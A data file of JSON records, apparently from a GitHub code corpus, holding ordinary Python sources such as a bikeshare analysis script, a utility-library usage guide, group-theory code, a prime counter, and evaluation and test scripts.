+{"seq_id":"16977577608","text":"n = int(input())\nbook = []\nfor _ in range(n):\n age, name = input().split()\n book.append((int(age), name))\n\nbook.sort(key=lambda x: x[0])\n\nfor b in book:\n print(b[0], b[1])","repo_name":"rlacksgus97/algorithms","sub_path":"2022-01/10814.py","file_name":"10814.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"26597195237","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Enter The City Name: (chicago, new york city, or washington): ').lower()\n if city not in CITY_DATA.keys():\n print('Please, Enter the city correctly!')\n else:\n break\n\n # get user input for month (all, january, february, ... , june)\n months = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n \n while True:\n month = input('Choose Month: (january, february, march, april, may, june, Or all): ').lower()\n if month in months:\n break\n else:\n print('Please, Enter a valid month!')\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n days = ['sunday', 'monday', 'tuesday', 'wednesday', ', thursday', 'friday', 'saturday', 'all']\n \n while True:\n day = input('Choose The Day: ').lower()\n if day in days:\n break\n else:\n print('Please, Enter a valid day!')\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n \"\"\"\n # reading the data from files csv\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the column to date time for extracting months and days easily\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # make new columns for extracting specific data\n df['month'] = df['Start Time'].dt.month\n df['day'] = df['Start Time'].dt.day_name()\n df['hour'] = df['Start Time'].dt.hour\n\n # make condition for matching month\n if month != 'all':\n months = months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1 # to make it appear in Number\n df = df[df['month'] == month]\n \n # filter by day to create a new df, using the title for making the first letter is capital\n if day != 'all':\n df = df[df['day'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n print(f'The most common Month is: {df.month.mode()[0]}')\n\n # display the most common day of week\n print(f'The most common Day is: {df.day.mode()[0]}')\n\n # display the most common start hour\n print(f'The most common Hour is: {df.hour.mode()[0]}')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('The most common start station is: {}'.format(df['Start Station'].mode()[0]))\n\n # display most commonly used end station\n print('The most common end station is: {}'.format(df['End Station'].mode()[0]))\n\n # Two ways for display most frequent combination of start station and end station trip \n df['st&en combination'] = df['Start Station']+ ',' + df['End Station']\n print('The most common combination is: {}'.format(df['st&en combination'].mode()[0]))\n\n 
print('-'*20)\n\n comm_station = df.groupby(['Start Station','End Station']).size().sort_values(ascending=False)\n print(comm_station.head(1).to_frame())\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total Travel Time is: ', df['Trip Duration'].sum().round())\n\n # display mean travel time\n print('Average Travel Time is: ', df['Trip Duration'].mean().round())\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df, city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('Counts of User: ', df['User Type'].value_counts().to_frame())\n\n # Display counts of gender\n if city != 'washington':\n print(f'\\nCounts of Gender: {df.Gender.value_counts().to_frame()}\\n')\n \n # Display earliest, most recent, and most common year of birth\n print(f\"The Earliest Year of Birth is: {int(df['Birth Year'].min())}\")\n print(f\"The Most Recent Year of Birth is: {int(df['Birth Year'].max())}\")\n print(f\"The Common Year of Birth is: {int(df['Birth Year'].mode()[0])}\")\n else:\n print('No (gender or birth year) for This City, Enter the Correct City.')\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n \n time_stats(df)\n station_stats(df)\n \n trip_duration_stats(df)\n user_stats(df, city)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n print('Thanks!')\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"EsamElhosiny/Bike-ShareProject","sub_path":"Bikeshare_Script.py","file_name":"Bikeshare_Script.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"13038833792","text":"\"\"\"一、安装(python 版本建议 3.7 以上)\n pip install --upgrade prestool (pip 版本22.0.3以上才可安装成功)\n\"\"\"\n\n'''二、常用工具'''\n\nfrom prestool.Tool import Tool\n\n\ntool = Tool()\n\n'''随机数据'''\ntool.random_name() # 随机姓名\ntool.random_phone() # 随机手机号\ntool.random_ssn() # 随机身份证\n\ntool.random_string(16) # 随机位数的字符串\ntool.random_number(8) # 随机位数的数字\n\ntool.random_ua() # 随机UA\ntool.random_ua('chrome') # 随机UA-Chrome\ntool.random_ua('firefox') # 随机UA-Firefox\ntool.random_ua('ie') # 随机UA-IE\ntool.random_ua('opera') # 随机UA-opera\ntool.random_ua('safari') # 随机UA-safari\n\n'''编码解码'''\ntool.url_encode('编码前的url地址') # 编码\ntool.url_decode('解码前的url地址') # 解码\n\ntool.base_64_encode('编码前的字符串') # base64编码\n\n\n'''加密相关'''\ntool.to_md5('原始字符串')\ntool.to_hmac_256('原始字符串', '加密key')\ntool.to_sha_256('原始字符串')\n\n'''发送消息'''\n'钉钉'\ntool.ding_talk_token = '钉钉机器人token'\ntool.ding_talk_sign_key = '钉钉机器人签名key'\n\ntool.send_ding_talk_msg('消息内容')\n'企业微信'\ntool.qy_wechat_token = '企业微信机器人token'\n\ntool.send_qy_wechat_msg('消息内容')\n'邮件'\ntool.mail_from_user_host = '发件地址host'\ntool.mail_from_user = '发件人邮箱号'\ntool.mail_from_user_pwd = '发件人pwd'\n\ntool.send_mail_msg(to_user='收件人邮箱地址(列表)', title='邮件标题', content='邮件内容')\n\n'''时间相关'''\ntool.time_stamp() # 秒级时间戳10位\ntool.time_stamp('ms') # 毫秒级时间戳13位\n\ntool.get_now_time() # 获取当前时间 20201206000000\ntool.get_now_time('-') # 获取当前时间 2020-12-06 00:00:00\n\ntool.date_to_time_stamp('2012-01-01 00:00:00') # 时间字符串转为时间戳\ntool.time_stamp_to_date(1732312234) # 时间戳转为时间字符串\n\n'格式转换'\ntool.json_dumps({\"test\": \"python字典\"}) # 字典转json\ntool.json_loads('{\"test\": \"python字典\"}') # json转字典\ntool.xml_to_dict('字符串') # xml转成python字典\ntool.dict_to_xml({\"test\": \"python字典\"}) # python字典 转成xml\n\n'http 请求'\ntool.http_client(url='', data={}, method='GET') # get请求\ntool.http_client(url='', data={}, method='POST') # post请求\n\ntool.get_cookies(url='接口地址', data={}, method='GET')\ntool.get_cookies(url='接口地址', data={}, method='POST')\n\ntool.trans_data_to_url(url='接口地址', data={}) # 把参数拼接到url上\n\n'dubbo 接口'\ntool.dubbo_args('参数1', '参数2', '参数3') # dubbo接口参数\ntool.invoke_dubbo('地址', '端口', '服务API名', '接口方法名', 'dubbo接口参数') # 请求dubbo接口\n\n'其他'\ntool.logger('日志信息')\ntool.get_ip_by_url('url地址') # 获取ip\n\n\"\"\"三、数据库语句(MySQL)\"\"\"\n'1) 生成数据库 sql 语句'\nfrom prestool.PresMySql import SqlStr\n\nsql = SqlStr()\n\n'''查询语句'''\n'''target 不传时,为全部字段,即 *,where={'key':'value'}'''\nsql.select_sql_str(table='table1', where={'id': 1, 'name': '张三'})\n\n'''select * from table1 where id = 1 and name = '张三';'''\n'''target=[i1,i2,i3] 时,为相应字段'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], where={'id': 1, 'name': '张三'})\n\n'''select a, b, c from table1 where 1=1 and id=1 and name='张三';'''\n'''limit=10 limit='10,1000' 为筛选限制字段'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], order={'age': 'desc', 'score': 'desc'}, limit=20)\n\n'''select a, b, c from table1 where 1=1 order by age desc, score desc limit 20;'''\n'''where 条件中有的字段为 null 或者 not null 时'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], where={'id': 1, 'name': 'null', 'age': not None})\n\n'''select a, b, c from table1 where 1=1 and id=1 and name is null and age is not null;'''\n'''支持排序语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], order={'age': 'desc', 'score': 'desc'})\n\n'''select a, b, c from table1 order by age desc, score desc;'''\n'''支持查询 in 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], select_in={'orders': [123121312, 123123445, 213123]})\n\n'''select a, b, c from table1 where 1=1 
and orders in (123121312, 123123445, 213123);'''\n'''支持 like 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], like={'name': '%光', 'address': \"中国%\"})\n\n'''select a, b, c from table1 where 1=1 and name like '%光' and address like '中国%';'''\n'''支持 between 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], between={'age': (10, 20), 'year': (2021, 2022)})\n\n'''select a, b, c from table1 where 1=1 and age between 10 and 20 and year between 2021 and 2022;'''\n'''支持大于、小于语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'],\n compare={'age': {'>': 10, '<': 20}, 'year': {'>=': '2021'}})\n\n'''select a, b, c from table1 where 1=1 and age > 10 and age < 20 and year >= 2021;'''\n\n\n'''更新语句'''\n'''target 为要更新的数据,为字典结构 (支持大于、小于语句、between 语句、like 语句、in 语句)'''\nsql.update_sql_str(table='table1', target={'name': '李四', 'age': 15}, where={'id': 1, 'name': '张三'})\n'''update table1\nset name='李四',\n age=15\nwhere id = 1\n and name = '张三';\n\n删除数据\n支持大于、小于语句、between 语句、like 语句、in 语句\nsql.delete_sql_str(table='table1', where={'id': 1, 'name': '张三'})\ndelete\nfrom table1\nwhere id = 1\n and name = '张三';\n\n插入数据\nsql.insert_sql_str(table='table1', target={'id': 1, 'name': '张三'})\ninsert into table1 (id, name)\nvalues (1, '张三');'''\n\n\n\"\"\"2) 执行数据库语句\"\"\"\n\nfrom prestool.PresMySql import PresMySql\n\npres = PresMySql()\n'''初始化数据库信息'''\npres.mysql_host = ''\npres.mysql_port = 3306\npres.mysql_user = ''\npres.mysql_pwd = ''\npres.mysql_db_name = ''\npres.mysql_charset = 'utf8mb4'\n\n'''执行相应语句即可,执行的方法参数等同于第三节所述的 sql 语句,如'''\npres.to_query(table='table1', target=['a', 'b', 'c'], between={'age': (10, 20), 'year': (2021, 2022)})\n\npres.to_insert(table='table1', target={'id': 1, 'name': '张三'})\n\npres.to_delete(table='table1', where={'id': 1, 'name': '张三'})\n\npres.to_update(table='table1', target={'name': '李四', 'age': 15}, where={'id': 1, 'name': '张三'})\n","repo_name":"zhangsihua/python_script","sub_path":"python-常用工具库的使用.py","file_name":"python-常用工具库的使用.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70172511408","text":"from Matrix import *\nfrom IQ_Polynomials import *\nfrom Root_Of_Unity import RootOfUnity\nfrom Permutation import Permutation\nfrom fractions import Fraction\nfrom itertools import product\nimport numpy as np\nfrom typing import List\nfrom Progress_Bar import printProgressBar\n\nMAX_ELEMENT_ORDER = 1000\n\nclass SymGroup:\n def __init__(self, polynomial:IQPoly, permutations:List[Permutation]=[]):\n #verify the parameters are correct types\n if (\n not isinstance(polynomial, IQPoly) or\n not isinstance(permutations, List) or\n not all(isinstance(perm, Permutation) for perm in permutations)\n ): raise TypeError('Initialize with a IQPoly and a list of Permutation.')\n\n # verify that the size of the exponent matrix is the same for all of the permutations\n if not all(perm.matrix.array.shape == polynomial.exponent_matrix.array.shape for perm in permutations):\n raise ValueError('Permutations used for generating the group must be the same size as the column generators from the inverse exponent matrix')\n\n # the maximal symmetry group is generated by the columns of the inverse exponent matrix\n inv_exp_matrix = polynomial.inverse_exponent_matrix\n inv_exp_columns = inv_exp_matrix.transpose().array\n\n # turn each column into a diagonal matrix\n generators = np.concatenate((\n [perm.matrix for perm in permutations],\n [Matrix.diagonal(col) for col in inv_exp_columns]\n ))\n\n # groupElements, groupElementGeneratorPowers = generateGroup(generators)\n\n groupElements = []\n groupElementGeneratorPowers = []\n\n diagonalGenerators = np.array([Matrix.diagonal(col) for col in inv_exp_columns])\n diagonalGroupElements = generateGroupBetter(\n diagonalGenerators,\n groupOrder=polynomial.exponent_matrix.intDeterminant(),\n showProgress=True,\n progressMsg='Generating the diagonal subgroup'\n )\n\n permutationGenerators = np.array([perm.matrix for perm in permutations])\n permuationGroupElements = generateGroupBetter(\n permutationGenerators,\n showProgress=True,\n progressMsg='Generating the permutation subgroup'\n )\n\n if len(permuationGroupElements) == 0:\n # no permutation elements so we're done\n groupElements = diagonalGroupElements\n\n self.order = len(groupElements)\n self.generators = generators\n self.elements = np.array(groupElements)\n self.conjugacyClasses = generateConjugacyClasses(groupElements)\n\n else:\n # the cartesian product of the diagonal group and the permutation group (while removing duplicates)\n # should be our whole group\n print('Generating the maximal group')\n totalIters = len(diagonalGroupElements) * len(permuationGroupElements)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for dIndex, diag in enumerate(diagonalGroupElements):\n for pIndex, perm in enumerate(permuationGroupElements):\n elementMatrix = perm * diag\n if elementMatrix not in groupElements:\n groupElements.append(elementMatrix)\n currentIter = (dIndex * len(permuationGroupElements)) + pIndex + 1\n printProgressBar(currentIter, totalIters, prefix = 'Progress:', suffix = f'Complete ({currentIter}/{totalIters})', length = 50)\n\n\n self.order = len(groupElements)\n self.generators = generators\n self.elements = np.array(groupElements)\n self.conjugacyClasses = generateConjugacyClasses(groupElements)\n\n def __repr__(self):\n return (\n f'Symmetry Group of order {self.order}\\n'\n )\n\n def __str__(self):\n gens = '\\n'.join(f'{str(gen)}\\n' for gen in self.generators)\n elems = '\\n'.join(f'{elem} {pows}\\n' for 
elem, pows in zip(self.elements, self.element_generator_representation))\n return (\n f'Symmetry Group of order {self.order}\\n'\n '\\n~~~~~~~~~Generators~~~~~~~~~\\n'\n f'{gens}'\n '\\n~~~~~~~~~~Elements~~~~~~~~~~\\n'\n f'{elems}'\n )\n\n\n\n\n\ndef getOrderOfElement(element:Matrix):\n a = np.empty(len(element.array), dtype=object)\n a.fill(RootOfUnity(Fraction()))\n identity_matrix = Matrix.diagonal(a)\n\n\n order = 1\n power = element.copy()\n while power != identity_matrix:\n power = power * element\n order += 1\n\n if order > MAX_ELEMENT_ORDER:\n raise ValueError('Cannot calcuate the order of the element. Order exceeded MAX_ELEMENT_ORDER.')\n \n return order\n\ndef generateGroup(generators, groupOrder = None, showProgress = False, progressMsg = None):\n\n if len(generators) == 0:\n return [], []\n\n # get the order of each generator\n generatorOrders = [getOrderOfElement(elem) for elem in generators]\n\n #create the list of cartesian products for the powers possible for the generating the group\n #this outputs a list of integers that are used as powers on the generators\n iterableList = []\n for elementOrder in generatorOrders:\n iterableSet = [*range(1, elementOrder + 1)]\n iterableList.append(iterableSet)\n cartesianProduct = list(product(*iterableList))\n\n #use the cartesian product elements to calculate the group elements\n #save both the actual matrix and the generator products representation\n groupElements = []\n groupElementGeneratorPowers = []\n totalIters = groupOrder if groupOrder != None else len(cartesianProduct)\n if showProgress:\n if progressMsg != None:\n print(progressMsg)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for cIndex, elementPowers in enumerate(cartesianProduct):\n # if we have all of the elements already, break\n if (groupOrder != None and len(groupElements) == groupOrder):\n break\n\n # set up the identity matrix with roots of unity\n a = np.empty(len(generators[0].array), dtype=object)\n a.fill(RootOfUnity(Fraction()))\n identity_matrix = Matrix.diagonal(a)\n\n # run through the generators and build the element\n elementMatrix = identity_matrix\n generatorRepr = []\n for pIndex, power in enumerate(elementPowers):\n elementMatrix *= generators[pIndex]**power\n generatorRepr.append(power)\n if elementMatrix not in groupElements:\n groupElements.append(elementMatrix)\n groupElementGeneratorPowers.append(generatorRepr)\n\n if showProgress:\n if groupOrder != None:\n printProgressBar(len(groupElements), totalIters, prefix = 'Progress:', suffix = f'Complete ({len(groupElements)}/{totalIters})', length = 50)\n else:\n printProgressBar(cIndex + 1, totalIters, prefix = 'Progress:', suffix = f'Complete ({cIndex + 1}/{totalIters})', length = 50)\n\n return groupElements, groupElementGeneratorPowers\n \ndef generateGroupBetter(generators, groupOrder = None, showProgress = False, progressMsg = None):\n if len(generators) == 0:\n return []\n \n groupElements = []\n totalIters = len(generators)\n if showProgress:\n if progressMsg != None:\n print(progressMsg)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for index, generator in enumerate(generators):\n powers = getAllElementPowers(generator)\n newElements = getAllProducts(groupElements, powers)\n groupElements += newElements\n if (len(groupElements) == groupOrder):\n return groupElements\n\n if showProgress: \n printProgressBar(index + 1, totalIters, prefix = 'Progress:', suffix = 
f'Complete ({index + 1}/{totalIters})', length = 50)\n\n return groupElements\n\ndef generateConjugacyClasses(elements):\n tmpElements = elements.copy()\n conjugacyClasses = []\n iterationNum = 0\n totalIterations = len(elements)\n \n print('Generating the conjugacy classes')\n printProgressBar(0, totalIterations, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIterations})', length = 50)\n while (len(tmpElements) > 0):\n currentElement = tmpElements[0]\n currentConjugacyClass = []\n for element in elements:\n conjugate = element * currentElement * element.verySlow_rootOfUnityInverse()\n if conjugate not in currentConjugacyClass:\n currentConjugacyClass.append(conjugate)\n tmpElements.remove(conjugate)\n iterationNum += 1\n printProgressBar(iterationNum, totalIterations, prefix = 'Progress:', suffix = f'Complete ({iterationNum}/{totalIterations})', length = 50)\n conjugacyClasses.append(currentConjugacyClass)\n \n return conjugacyClasses\n\n\n\n\ndef getAllElementPowers(element):\n order = getOrderOfElement(element)\n\n generatedElements = [element]\n for power in range(2, order + 1):\n generatedElements.append(generatedElements[-1] * element)\n \n return generatedElements\n \ndef getAllProducts(setA, setB):\n if len(setA) == 0:\n return setB\n if len(setB) == 0:\n return setA\n\n totalIters = len(setA) * len(setB)\n\n groupElements = []\n # printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete (0/{totalIters})', length = 50)\n for indexA, elementA in enumerate(setA):\n for indexB, elementB in enumerate(setB):\n element = elementA * elementB\n if element not in groupElements:\n groupElements.append(element)\n currentIter = (indexA * len(setB)) + indexB + 1\n # printProgressBar(currentIter, totalIters, prefix = 'Progress:', suffix = f'Complete ({currentIter}/{totalIters})', length = 50)\n \n return groupElements","repo_name":"dunkmway/State-Space-V.2","sub_path":"Symmetry_Groups.py","file_name":"Symmetry_Groups.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24597866092","text":"import math\nimport multiprocessing as multi\nfrom timeit import default_timer as timer\n\ndef isPrime(num):\n if num <= 1: return False\n if num == 2: return True\n if num % 2 == 0: return False\n\n boundary = math.floor(math.sqrt(num))\n\n for x in range(3, boundary + 1, 2):\n if num % x == 0:\n return False\n return True\n\ndef findPrimesParallel(numMax):\n full_list = dict()\n\n for x in range(0, numMax):\n if isPrime(x):\n full_list[x] = True\n return full_list\n\nstart = timer()\nnumMax = 1000000\n\nresult = findPrimesParallel(numMax)\ntt = timer() - start\nprint(\"Number of primes: %d\" %len(result))\nprint(\"Process time: %f s\" %tt)","repo_name":"NagyDominik/pythonCUDA","sub_path":"prime_sc.py","file_name":"prime_sc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12085895992","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport networkx as nx\nimport numpy as np\nfrom digraphx.tiny_digraph import DiGraphAdapter\nfrom ellalgo.cutting_plane import cutting_plane_optim\nfrom ellalgo.ell import Ell\n\nfrom netoptim.optscaling_oracle import OptScalingOracle\n\n\ndef vdc(n, base=2):\n \"\"\"[summary]\n\n Arguments:\n n ([type]): [description]\n\n Keyword Arguments:\n base (int): [description] (default: {2})\n\n Returns:\n [type]: [description]\n \"\"\"\n vdc, denom = 0.0, 1.0\n while n:\n denom *= base\n n, remainder = divmod(n, base)\n vdc += remainder / denom\n return vdc\n\n\ndef vdcorput(n, base=2):\n \"\"\"[summary]\n\n Arguments:\n n ([type]): [description]\n\n Keyword Arguments:\n base (int): [description] (default: {2})\n\n Returns:\n [type]: [description]\n \"\"\"\n return [vdc(i, base) for i in range(n)]\n\n\ndef form_graph(T, pos, eta, seed=None):\n \"\"\"Form N by N grid of nodes, connect nodes within eta.\n mu and eta are relative to 1/(N-1)\n\n Arguments:\n t (float): [description]\n pos ([type]): [description]\n eta ([type]): [description]\n\n Keyword Arguments:\n seed ([type]): [description] (default: {None})\n\n Returns:\n [type]: [description]\n \"\"\"\n if seed:\n np.random.seed(seed)\n\n N = np.sqrt(T)\n eta = eta / (N - 1)\n\n # generate perterbed grid positions for the nodes\n pos = dict(enumerate(pos))\n n = len(pos)\n\n # connect nodes with edges\n gra = nx.random_geometric_graph(n, eta, pos=pos)\n gra = nx.DiGraph(gra)\n gra = DiGraphAdapter(gra)\n # gra.add_node('dummy', pos = (0.3, 0.4))\n # gra.add_edge('dummy', 1)\n # gra.nodemap = {vtx : i_v for i_v, vtx in enumerate(gra.nodes())}\n return gra\n\n\nN = 75\nM = 20\nT = N + M\nxbase = 2\nybase = 3\nx = [i for i in vdcorput(T, xbase)]\ny = [i for i in vdcorput(T, ybase)]\npos = zip(x, y)\ngra = form_graph(T, pos, 1.6, seed=5)\n# for utx, vtx in gra.edges():\n# h = np.array(gra.nodes()[utx]['pos']) - np.array(gra.nodes()[vtx]['pos'])\n# gra[utx][vtx]['cost'] = np.sqrt(h @ h)\n\nfor utx, vtx in gra.edges():\n h = np.array(gra.nodes()[utx][\"pos\"]) - np.array(gra.nodes()[vtx][\"pos\"])\n distance = np.log(np.sqrt(h.dot(h)))\n gra[utx][vtx][\"cost\"] = (distance, distance)\n\ncmax = max(cost[0] for _, _, cost in gra.edges.data(\"cost\"))\ncmin = min(cost[0] for _, _, cost in gra.edges.data(\"cost\"))\n\n\ndef get_cost(edge):\n return edge[\"cost\"]\n\n\ndef test_optscaling():\n \"\"\"[summary]\n\n Keyword Arguments:\n duration (float): [description] (default: {0.000001})\n\n Returns:\n [type]: [description]\n \"\"\"\n xinit = np.array([cmax, cmin])\n t = cmax - cmin\n ellip = Ell(1.5 * t, xinit)\n dist = list(0 for _ in gra)\n omega = OptScalingOracle(gra, dist, get_cost)\n xbest, _, _ = cutting_plane_optim(omega, ellip, float(\"inf\"))\n # fmt = '{:f} {} {} {}'\n # print(np.exp(xbest))\n # print(fmt.format(np.exp(fb), niter, feasible, status))\n assert xbest is not None\n # return ell_info.num_iters\n","repo_name":"luk036/netoptim","sub_path":"tests/test_optscaling.py","file_name":"test_optscaling.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12339807704","text":"import sys\r\nimport importlib\r\nfrom data import Test_Dataset\r\nimport torch\r\nimport time\r\nfrom progress.bar import Bar\r\nimport os\r\nfrom collections import OrderedDict\r\nimport cv2\r\nfrom PIL import Image\r\nfrom util import *\r\nimport numpy as np\r\nimport argparse\r\n\r\nfrom data import *\r\nfrom metric import *\r\n\r\n# python3 eval.py --data_path=../dataset/ --pre_path=maps/rgbt/ADF --mode=te\r\n# python3 eval.py --data_path=../dataset/ --pre_path=maps/vsod/LSD --mode=oe\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data_path', default='../../dataset/', help='The name of network')\r\n parser.add_argument('--vals', default='all', help='Set the testing sets')\r\n \r\n parser.add_argument('--pre_path', default='./maps', help='Weight path of network')\r\n parser.add_argument('--mode', default='ce', help='Weight path of network')\r\n \r\n params = parser.parse_args()\r\n config = vars(params)\r\n config['orig_size'] = True\r\n config['size'] = 320\r\n config['mode'] = config['mode'].split(',')\r\n config['stage'] = 1\r\n config['trset'] = 'tr'\r\n \r\n if config['vals'] == 'all':\r\n vals = ['SED2', 'PASCAL-S', 'ECSSD', 'HKU-IS', 'DUTS-TE', 'DUT-OMRON']\r\n else:\r\n vals = config['vals'].split(',')\r\n \r\n #print(config['mode'])\r\n test_sets = get_test_list(modes=config['mode'], config=config)\r\n \r\n #print(test_sets.items())\r\n for set_name, test_set in test_sets.items():\r\n #img_path = '{}/{}/'.format(config['pre_path'], val)\r\n set_sub = set_name.split('_')[-1]\r\n #print(set_sub)\r\n img_path = '{}/{}/'.format(config['pre_path'], set_sub)\r\n #img_path = config['pre_path']\r\n if not os.path.exists(img_path):\r\n print('{} not exists!!!!!'.format(img_path))\r\n continue\r\n #test_set = Test_Dataset(name=val, config=config)\r\n titer = test_set.size\r\n MR = MetricRecorder(titer)\r\n #MR = MetricRecorder()\r\n \r\n #print(titer)\r\n test_bar = Bar('Dataset {:10}:'.format(set_name), max=titer)\r\n pre_name = ''\r\n kk = 0\r\n for j in range(titer):\r\n sample_dict = test_set.load_data(j)\r\n gt = sample_dict['gt']\r\n name = sample_dict['name']\r\n #_, gt, name = test_set.load_data(j)\r\n name = name.split('.')[0]\r\n \r\n a,b = name.split('/')\r\n \r\n #if pre_name == a:\r\n # kk += 1\r\n #else:\r\n # kk = 0\r\n #name = '{}/{}'.format(a, kk)\r\n #name = '{}/{}_{}'.format(a, a, b)\r\n \r\n pred = Image.open(img_path + name + '.png').convert('L')\r\n #print(np.max(pred))\r\n out_shape = gt.shape\r\n \r\n #MR.update(pre=pred, gt=gt)\r\n pred = np.array(pred.resize((out_shape[::-1])))\r\n \r\n pred, gt = normalize_pil(pred, gt)\r\n MR.update(pre=pred, gt=gt)\r\n #print(np.max(pred), np.max(gt))\r\n #MR.update(pre=pred.astype(np.uint8), gt=(gt * 255).astype(np.uint8))\r\n \r\n \r\n Bar.suffix = '{}/{}'.format(j, titer)\r\n test_bar.next()\r\n \r\n #scores = MR.show(bit_num=3)\r\n mae, (maxf, meanf, *_), sm, em, wfm = MR.show(bit_num=3)\r\n print(' Max-F: {}, Maen-F: {}, Fbw: {}, MAE: {}, SM: {}, EM: {}.'.format(maxf, meanf, wfm, mae, sm, em))\r\n #print(' Max-F: {}, adp-F: {}, Fbw: {}, MAE: {}, SM: {}, EM: {}.'.format(scores['fm'], scores['adpFm'], scores['wFm'], scores['MAE'], scores['Sm'], scores['adpEm']))\r\n #mae, (maxf, meanf, *_), sm, em, wfm = MR.show(bit_num=3)\r\n #print(' MAE: {}, Max-F: {}, Maen-F: {}, SM: {}, EM: {}, Fbw: {}.'.format(mae, maxf, meanf, sm, em, wfm))\r\n\r\n \r\nif __name__ == \"__main__\":\r\n 
main()","repo_name":"moothes/A2S-v2","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"2"}
+{"seq_id":"13678553451","text":"# -*- coding: utf-8 -*-\n\n# Author: Niels A.D.\n# Project: HGB (https://github.com/nielsAD/hgb)\n# License: Mozilla Public License, v2.0\n\nimport sys\nimport os\nimport re\nimport math\nimport subprocess\nimport itertools\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nkernels = {\n 'kern_rank_omp_def_row': '',\n 'kern_rank_omp_stp_row': 'OMP1',\n 'kern_rank_omp_bin_row': 'OMP3',\n 'kern_rank_cpu_lib_row': 'MKL',\n 'kern_rank_cud_def_row': '',\n 'kern_rank_cud_stp_row': 'CUD1',\n 'kern_rank_cud_wrp_row': 'CUD2',\n 'kern_rank_cud_dyn_row': 'CUD3',\n 'kern_rank_cud_lib_row': 'CSP',\n 'kern_rank_ocl_def_row': '',\n 'kern_rank_ocl_stp_row': 'OCL1',\n 'kern_rank_ocl_wrp_row': 'OCL2',\n 'kern_rank_omp_def_col': '',\n 'kern_rank_omp_stp_col': 'OMP1',\n 'kern_rank_omp_bin_col': 'OMP3',\n 'kern_rank_cpu_lib_col': 'MKL',\n 'kern_rank_cud_def_col': '',\n 'kern_rank_cud_stp_col': 'CUD1',\n 'kern_rank_cud_wrp_col': 'CUD2',\n 'kern_rank_cud_dyn_col': 'CUD3',\n 'kern_rank_cud_lib_col': 'CSP',\n 'kern_rank_ocl_def_col': '',\n 'kern_rank_ocl_stp_col': 'OCL1',\n 'kern_rank_ocl_wrp_col': 'OCL2',\n\n 'csr_omp_bin': 'OMP3',\n 'csr_mkl_lib': 'MKL',\n 'csr_cud_lib': 'CSP',\n\n 'bcsr_ref_def': '',\n 'bcsr_ref_stp': '',\n 